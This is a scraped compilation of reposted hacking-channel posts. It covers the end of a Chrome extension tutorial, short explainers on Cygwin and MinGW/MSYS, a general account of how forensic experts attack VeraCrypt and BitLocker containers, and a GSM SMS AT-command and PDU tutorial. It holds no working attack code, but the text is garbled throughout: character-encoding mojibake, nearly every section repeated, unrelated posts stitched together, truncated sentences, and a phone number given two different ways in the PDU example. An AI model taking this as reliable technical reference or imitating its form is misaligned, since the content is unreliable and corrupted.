"js": ["jquery-2.1.3.min.js", "content.js"]
}
],
"browser_action": {
"default_icon": "icon.png"
}
}
And hereβs the full directory structure:
.
βββ background.js
βββ content.js
βββ icon.png
βββ jquery-2.1.3.min.js
βββ manifest.json
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How create a firefox or chrome extension full part 4-final :
pinterest.com/UndercOdeOfficial
π¦ ππΌππ πππΈβπ :
1) Opening a new tab
We can use the chrome.tabs API to open a new tab:
chrome.tabs.create({"url": "http://google.com"});
But chrome.tabs can only be used by background.js, so weβll have to add some more message passing since background.js can open the tab, but canβt grab the URL. Hereβs the idea:
2) Listen for a click on the browser action in background.js. When itβs clicked, send a clicked_browser_action event to content.js.
When content.js receives the event, it grabs the URL of the first link on the page. Then it sends open_new_tab back to background.js with the URL to open.
background.js listens for open_new_tab and opens a new tab with the given URL when it receives the message.
3) Clicking on the browser action will trigger background.js, which will send a message to content.js, which will send a URL back to background.js, which will open a new tab with the given URL.
4) First, we need to tell content.js to send the URL to background.js. Change content.js to use this code:
// content.js
chrome.runtime.onMessage.addListener(
function(request, sender, sendResponse) {
if( request.message === "clicked_browser_action" ) {
var firstHref = $("a[href^='http']").eq(0).attr("href");
console.log(firstHref);
// This line is new!
chrome.runtime.sendMessage({"message": "open_new_tab", "url": firstHref});
}
}
);
5) Now we need to add some code to tell background.js to listen for that event:
// background.js
// Called when the user clicks on the browser action.
chrome.browserAction.onClicked.addListener(function(tab) {
// Send a message to the active tab
chrome.tabs.query({active: true, currentWindow: true}, function(tabs) {
var activeTab = tabs[0];
chrome.tabs.sendMessage(activeTab.id, {"message": "clicked_browser_action"});
});
});
// This block is new!
chrome.runtime.onMessage.addListener(
function(request, sender, sendResponse) {
if( request.message === "open_new_tab" ) {
chrome.tabs.create({"url": request.url});
}
}
);
6) Now when you click on the browser action icon, it opens a new tab with the first external URL on the page.
π¦ Wrapping it up
The full content.js and background.js are above. Hereβs the full manifest.json:
{
"manifest_version": 2,
"name": "My Cool Extension",
"version": "0.1",
"background": {
"scripts": ["background.js"]
},
"content_scripts": [
{
"matches": [
"<all_urls>"
],
"js": ["jquery-2.1.3.min.js", "content.js"]
}
],
"browser_action": {
"default_icon": "icon.png"
}
}
And hereβs the full directory structure:
.
βββ background.js
βββ content.js
βββ icon.png
βββ jquery-2.1.3.min.js
βββ manifest.json
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦What is Cygwin ?
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) Cygwin is the most complete implementation of the GNU environment for Windows. It provides most of the POSIX API as a library, which allows you to build programs from UNIX without porting, unless they require UNIX semantics . A striking example is demons, they also need fork()signals that are not in Windows, and Windows services are completely different.
2) In addition to the library, the distribution contains a set of classic UNIX commands and a terminal. Command implementations use this library and support some UNIX features, such as case-sensitive file names.
3) Target use: if you donβt have the desire or ability to port the program to Windows or use only platform independent APIs, you can build it βunder Cygwinβ, at the cost of dependence on cygwin1.dlland relative isolation from the rest of the system.
4) Many people have installed and continue to install the Cygwin environment in order to be able to use the classic UNIX commands on Windows. Some developers also include Cygwin in the instructions for building their Windows programs, although the program itself does not contact cygwin1.dll. For this purpose it may be more correct to use MSYS.
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦What is Cygwin ?
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) Cygwin is the most complete implementation of the GNU environment for Windows. It provides most of the POSIX API as a library, which allows you to build programs from UNIX without porting, unless they require UNIX semantics . A striking example is demons, they also need fork()signals that are not in Windows, and Windows services are completely different.
2) In addition to the library, the distribution contains a set of classic UNIX commands and a terminal. Command implementations use this library and support some UNIX features, such as case-sensitive file names.
3) Target use: if you donβt have the desire or ability to port the program to Windows or use only platform independent APIs, you can build it βunder Cygwinβ, at the cost of dependence on cygwin1.dlland relative isolation from the rest of the system.
4) Many people have installed and continue to install the Cygwin environment in order to be able to use the classic UNIX commands on Windows. Some developers also include Cygwin in the instructions for building their Windows programs, although the program itself does not contact cygwin1.dll. For this purpose it may be more correct to use MSYS.
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ MinGW and MSYS
pinterest.com/UndercOdeOfficial
π¦ ππΌππ πππΈβπ :
1) If the goal of Cygwin is to make it possible to build unmodified applications on Windows at the cost of external dependency, then the goal of MinGW + MSYS is to produce applications without external dependencies.
2) MinGW and MSYS are independent packages, but they are often confused and mixed together (and often confused with Cygwin). We can say that MinGW is the equivalent of GCC and binutils, and MSYS is the extended equivalent of coreutils.
3) Let's start with MSYS. MSYS is a more βnativeβ and lightweight alternative to Cygwin. This package includes a library with implementations of POSIX functions, but it is intended for internal use, and the authors categorically do not recommend linking their applications with it.
4) The MSYS library does not implement UNIX on top of Windows, but follows the Windows conventions - for example, it deliberately does not case-sensitive letters in file paths. The main goal of MSYS is to provide the necessary build programs for scripts like Bourne shell, make, etc., which is usually required for autotools.
5) MinGW contains versions of GCC and binutils (assembler as, linker ld, and so on) that produce Windows executables in PE / COFF format. Here we come to a key point: MinGW, like all other parts of the GNU toolchain, is a platform-independent project.
6) Cross compilation in the GNU toolchain has long been a common thing, and in GCC the target platform and host are independent of each other. You can run GCC on Linux for x86 and compile Linux programs on ARM, or vice versa. Not only the working and target processor architectures are not obliged to match. In the same way, even the OS and the format of the executable file are not required to match.
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ MinGW and MSYS
pinterest.com/UndercOdeOfficial
π¦ ππΌππ πππΈβπ :
1) If the goal of Cygwin is to make it possible to build unmodified applications on Windows at the cost of external dependency, then the goal of MinGW + MSYS is to produce applications without external dependencies.
2) MinGW and MSYS are independent packages, but they are often confused and mixed together (and often confused with Cygwin). We can say that MinGW is the equivalent of GCC and binutils, and MSYS is the extended equivalent of coreutils.
3) Let's start with MSYS. MSYS is a more βnativeβ and lightweight alternative to Cygwin. This package includes a library with implementations of POSIX functions, but it is intended for internal use, and the authors categorically do not recommend linking their applications with it.
4) The MSYS library does not implement UNIX on top of Windows, but follows the Windows conventions - for example, it deliberately does not case-sensitive letters in file paths. The main goal of MSYS is to provide the necessary build programs for scripts like Bourne shell, make, etc., which is usually required for autotools.
5) MinGW contains versions of GCC and binutils (assembler as, linker ld, and so on) that produce Windows executables in PE / COFF format. Here we come to a key point: MinGW, like all other parts of the GNU toolchain, is a platform-independent project.
6) Cross compilation in the GNU toolchain has long been a common thing, and in GCC the target platform and host are independent of each other. You can run GCC on Linux for x86 and compile Linux programs on ARM, or vice versa. Not only the working and target processor architectures are not obliged to match. In the same way, even the OS and the format of the executable file are not required to match.
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How the VeraCrypt Police Hack Containers 2020 ?
pinterest.com/UndercOdeOfficial
π¦ ππΌππ πππΈβπ :
lets talk about breaking cryptocontainers. However, if you do not know how experts who try to access encrypted data will act, it will be difficult to understand the meaning of the described actions.
> The expertβs actions in the laboratory depend on what exactly and how was seized during the search.
π¦ Standard methods
1) The most typical case is the removal of entire external drives; computers turn off and are also completely removed, but the expertβs laboratory doesnβt get the whole computer assembled, but only the disks from it.
2) A similar scenario is the very case that developers of all cryptocontainers have been preparing to withstand for so long, without exception. Frontal attacks on cryptocontainers are ineffective, and on some of their varieties (in particular, boot sections encrypted in TPM or TPM + key mode) are absolutely ineffective.
3) In a typical case, the expert will first try to analyze the hibernation and swap files. If the user has neglected the security settings of the cryptocontainer (by the way, when using BitLocker these settings are far from obvious), the encryption keys are quietly extracted from these files, and encrypted volumes are decrypted without lengthy attacks. Of course, in some cases this attack will not work. It will be useless if at least one of the conditions described below is met.
4) The boot disk is encrypted. In this case, both the page file and the hibernation file will also be encrypted. For example, if BitLocker is used to encrypt the boot partition (this makes sense even if the rest of the data is encrypted in VeraCrypt containers), then Microsoft describes the security model in the FAQ and the BitLocker Security FAQ (What are the implications of using the sleep or hibernate power management section) options?). By the way, there are exceptions to this rule - for example, if the swap file is moved to a separate device from the boot device (a fairly common case for users who thus βsaveβ the boot SSD resource).
5) The computer was turned off normally (via the Shutdown command) or was taken out in a state of hybrid sleep or hibernation; at the same time, the cryptocontainer is configured in such a way as to automatically unmount the encrypted volumes and destroy the encryption keys in the RAM when the computer goes to sleep, hibernation, or when it is turned off.
6) A bit hard to grasp? Iβll simplify it: if at the time of removal the encrypted volume was mounted, and the police simply pulled the plug out of the socket, then the encryption key will most likely remain in the hibernation file (whether it can be pulled out from there depends on point
> But if the computer was turned off with the Shutdown command, then the presence or absence of a key will depend on the settings of the cryptocontainer. We will talk more about how to properly configure VeraCrypt.
7) Finally, the obvious: paging and hibernation file analysis is completely useless if the encrypted volume was not mounted at the time of removal of the computer.
8) If it is not possible to extract the encryption keys, the expert will look for them in the cloud or on the corporate network (for volumes encrypted using standard BitLocker or FileVault 2 tools). Only after this a frontal attack will be used - brute force passwords.
π¦ How the VeraCrypt Police Hack Containers 2020 ?
pinterest.com/UndercOdeOfficial
π¦ ππΌππ πππΈβπ :
lets talk about breaking cryptocontainers. However, if you do not know how experts who try to access encrypted data will act, it will be difficult to understand the meaning of the described actions.
> The expertβs actions in the laboratory depend on what exactly and how was seized during the search.
π¦ Standard methods
1) The most typical case is the removal of entire external drives; computers turn off and are also completely removed, but the expertβs laboratory doesnβt get the whole computer assembled, but only the disks from it.
2) A similar scenario is the very case that developers of all cryptocontainers have been preparing to withstand for so long, without exception. Frontal attacks on cryptocontainers are ineffective, and on some of their varieties (in particular, boot sections encrypted in TPM or TPM + key mode) are absolutely ineffective.
3) In a typical case, the expert will first try to analyze the hibernation and swap files. If the user has neglected the security settings of the cryptocontainer (by the way, when using BitLocker these settings are far from obvious), the encryption keys are quietly extracted from these files, and encrypted volumes are decrypted without lengthy attacks. Of course, in some cases this attack will not work. It will be useless if at least one of the conditions described below is met.
4) The boot disk is encrypted. In this case, both the page file and the hibernation file will also be encrypted. For example, if BitLocker is used to encrypt the boot partition (this makes sense even if the rest of the data is encrypted in VeraCrypt containers), then Microsoft describes the security model in the FAQ and the BitLocker Security FAQ (What are the implications of using the sleep or hibernate power management section) options?). By the way, there are exceptions to this rule - for example, if the swap file is moved to a separate device from the boot device (a fairly common case for users who thus βsaveβ the boot SSD resource).
5) The computer was turned off normally (via the Shutdown command) or was taken out in a state of hybrid sleep or hibernation; at the same time, the cryptocontainer is configured in such a way as to automatically unmount the encrypted volumes and destroy the encryption keys in the RAM when the computer goes to sleep, hibernation, or when it is turned off.
6) A bit hard to grasp? Iβll simplify it: if at the time of removal the encrypted volume was mounted, and the police simply pulled the plug out of the socket, then the encryption key will most likely remain in the hibernation file (whether it can be pulled out from there depends on point
> But if the computer was turned off with the Shutdown command, then the presence or absence of a key will depend on the settings of the cryptocontainer. We will talk more about how to properly configure VeraCrypt.
7) Finally, the obvious: paging and hibernation file analysis is completely useless if the encrypted volume was not mounted at the time of removal of the computer.
8) If it is not possible to extract the encryption keys, the expert will look for them in the cloud or on the corporate network (for volumes encrypted using standard BitLocker or FileVault 2 tools). Only after this a frontal attack will be used - brute force passwords.
9) Password brute force is also not easy. Firstly, the days are long past when a βfrontal attackβ was understood as a simple brute force. The attack speed will be such that a complete search of the entire password space becomes useless if the length of the password to the cryptocontainer exceeds 7-8 characters. Accordingly, dictionaries are used for attacks, primarily dictionaries made up of passwords of the user himself (you can extract them both from the user's computer and his mobile devices or directly from the Google Account cloud ). Methods have been developed for a long time to analyze passwords and create rules-patterns based on which βsimilarβ passwords will be generated.
10) To attack the police, they will use one of the few software packages that allow you to launch an attack on many (in theory, up to several thousand, in reality, about hundreds) computers, each of which will be equipped with several graphics accelerators. >@UndercodeTesting computers of the GeForce 2080 and 40 processor cores are on the desktops of police experts from one British backwater.
11) To begin with, the enumeration area will be limited to the set of characters that appear in the user's passwords.
12) Then they will test the attack with mutations (a word is taken from the dictionary, and its variants are checked, compiled according to fairly simple rules, which are used by the vast majority of ordinary users). By the way, attempts to attack usually occur in mutations in cases where the police have no clues - they failed to get a single user password.
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
10) To attack the police, they will use one of the few software packages that allow you to launch an attack on many (in theory, up to several thousand, in reality, about hundreds) computers, each of which will be equipped with several graphics accelerators. >@UndercodeTesting computers of the GeForce 2080 and 40 processor cores are on the desktops of police experts from one British backwater.
11) To begin with, the enumeration area will be limited to the set of characters that appear in the user's passwords.
12) Then they will test the attack with mutations (a word is taken from the dictionary, and its variants are checked, compiled according to fairly simple rules, which are used by the vast majority of ordinary users). By the way, attempts to attack usually occur in mutations in cases where the police have no clues - they failed to get a single user password.
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ lets share now some mobile development code: FULL PART 1 :
>At present, the application of mobile phone short messages is becoming more and more widespread. There are more and more sites, but the services of some sites are not satisfactory, and often send short messages to the sea.
twitter.com/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
>by sendind sms
1) Data lines connected to
first, connected by S35 / 25 data lines mobile phone and computer serial ports. Then, open the HyperTerminal and select the direct serial port connection. The port parameters are set to 19200 rate, no parity, data bit 8, stop bit 1.
2) Infrared connection
computer if used with an infrared port, you can set the phone's wireless connection. First make sure that the computer's infrared port is turned on, and turn on the infrared and fax / data functions of the mobile phone. To connect to the infrared port, an infrared device Siemens S35 should appear on the computer system tray (if no infrared monitor is installed, it will not be displayed). Then, open HyperTerminal and select the serial port on IrDa.
3) Connection Test
Click HyperTerminal call button on the toolbar, type AT and press Enter, OK appears on the screen if you're connected computer and cell phone, then you can enter the various types of GSM AT commands.
For example: query the mobile phone manufacturer, enter AT οΌ CGMI = <CR>, the screen displays Siemens.
Under normal circumstances, execute the test command AT οΌ CMGS =? <CR>. If it returns OK, the mobile phone supports this command. The complete syntax format of this instruction is as follows:
If PDU mode (+ CMGF = 0) + CMGS = <length> <CR> PDU is given <ctrl-Z / ESC>
4) If the short message format instruction AT + CMGF returns 0, the SMS format is PDU Mode, and then execute the AT + CMGS = <data length> command, the phone returns to the ">" symbol and waits for input. Enter the PDU data and end with ^ Z or Esc.
5) If the message is sent successfully, it returns OK, and the message number is displayed:
+ CMGS: <mr>
6) If the message fails to be sent, the following message is returned:
> Data analysis PDU format
below to go through the analysis of information stored in the phone, and to introduce SMS PDU data format. First, write a short message with your mobile phone, and send the mobile phone number 13605690631, and the content of the message is "Hello World!". This information can be read out by executing AT + CMGL = 2.
7) The operation process is as follows (italic characters are response messages, {} are comments):
AT
OK
AT οΌ CMGL = 2 {read
unsent short messages} + CMGL: 1,2,, 24 {1 indicates the number of messages, 2 indicates no messages, 24 indicates the total capacity of the message}
08 91 683108501505F0 11 00 0B 81 3106656930F1 0000A7 0B E8329BFD06DDDF723619
OKγ
7) This information is analyzed below:
08: short message center address length.
91: short message center number type, 91 is TON / NPI. TON / NPI complies with the International / E.164 standard, which means a '+' sign must be added before the number; other values ββare also possible, but 91 is the most commonly used.
683108501505F0: The short message number is the address of the service center used. Due to slight processing on the location, the actual number should be: 8613805515500 (the letter F means the length minus 1), which is the number of the GSM short message center where the author is located.
8) 11: file header byte (header byte, is a bitmask). Here 11 refers to sending short messages normally.
00: Information type.
0B: called number length.
81: called number type.
3106656930F1: The called number has also been shifted. The actual number is 13605696031.
0000A7: GSM Default Alphabet, or 000010 for Chinese.
0B: short message length.
E8329BFD06DDDF723619: The content of the short message "Hello World!"
12) Coding and programming SMS implementation
Here we introduce the method to encode information in plain English and Chinese are pure.
π¦ lets share now some mobile development code: FULL PART 1 :
>At present, the application of mobile phone short messages is becoming more and more widespread. There are more and more sites, but the services of some sites are not satisfactory, and often send short messages to the sea.
twitter.com/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
>by sendind sms
1) Data lines connected to
first, connected by S35 / 25 data lines mobile phone and computer serial ports. Then, open the HyperTerminal and select the direct serial port connection. The port parameters are set to 19200 rate, no parity, data bit 8, stop bit 1.
2) Infrared connection
computer if used with an infrared port, you can set the phone's wireless connection. First make sure that the computer's infrared port is turned on, and turn on the infrared and fax / data functions of the mobile phone. To connect to the infrared port, an infrared device Siemens S35 should appear on the computer system tray (if no infrared monitor is installed, it will not be displayed). Then, open HyperTerminal and select the serial port on IrDa.
3) Connection Test
Click HyperTerminal call button on the toolbar, type AT and press Enter, OK appears on the screen if you're connected computer and cell phone, then you can enter the various types of GSM AT commands.
For example: query the mobile phone manufacturer, enter AT οΌ CGMI = <CR>, the screen displays Siemens.
Under normal circumstances, execute the test command AT οΌ CMGS =? <CR>. If it returns OK, the mobile phone supports this command. The complete syntax format of this instruction is as follows:
If PDU mode (+ CMGF = 0) + CMGS = <length> <CR> PDU is given <ctrl-Z / ESC>
4) If the short message format instruction AT + CMGF returns 0, the SMS format is PDU Mode, and then execute the AT + CMGS = <data length> command, the phone returns to the ">" symbol and waits for input. Enter the PDU data and end with ^ Z or Esc.
5) If the message is sent successfully, it returns OK, and the message number is displayed:
+ CMGS: <mr>
6) If the message fails to be sent, the following message is returned:
> Data analysis PDU format
below to go through the analysis of information stored in the phone, and to introduce SMS PDU data format. First, write a short message with your mobile phone, and send the mobile phone number 13605690631, and the content of the message is "Hello World!". This information can be read out by executing AT + CMGL = 2.
7) The operation process is as follows (italic characters are response messages, {} are comments):
AT
OK
AT οΌ CMGL = 2 {read
unsent short messages} + CMGL: 1,2,, 24 {1 indicates the number of messages, 2 indicates no messages, 24 indicates the total capacity of the message}
08 91 683108501505F0 11 00 0B 81 3106656930F1 0000A7 0B E8329BFD06DDDF723619
OKγ
7) This information is analyzed below:
08: short message center address length.
91: short message center number type, 91 is TON / NPI. TON / NPI complies with the International / E.164 standard, which means a '+' sign must be added before the number; other values ββare also possible, but 91 is the most commonly used.
683108501505F0: The short message number is the address of the service center used. Due to slight processing on the location, the actual number should be: 8613805515500 (the letter F means the length minus 1), which is the number of the GSM short message center where the author is located.
8) 11: file header byte (header byte, is a bitmask). Here 11 refers to sending short messages normally.
00: Information type.
0B: called number length.
81: called number type.
3106656930F1: The called number has also been shifted. The actual number is 13605696031.
0000A7: GSM Default Alphabet, or 000010 for Chinese.
0B: short message length.
E8329BFD06DDDF723619: The content of the short message "Hello World!"
12) Coding and programming SMS implementation
Here we introduce the method to encode information in plain English and Chinese are pure.